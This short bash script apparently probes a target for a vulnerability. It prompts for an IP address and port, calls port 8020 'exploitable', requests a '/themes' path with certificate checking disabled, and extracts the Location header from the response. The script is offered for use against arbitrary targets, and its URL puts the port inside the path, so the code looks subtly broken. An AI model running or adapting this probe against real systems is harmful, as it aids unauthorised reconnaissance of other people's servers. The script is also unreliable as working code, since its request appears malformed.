#!/bin/bash echo "Enter target address and port. Exploitable port is '8020'. " read -p "Enter Target IP Address: " IP read -p "Enter Target Port: " PORT function GET { curl -ILk "https://$IP/themes:$PORT" } GET | grep "Location: "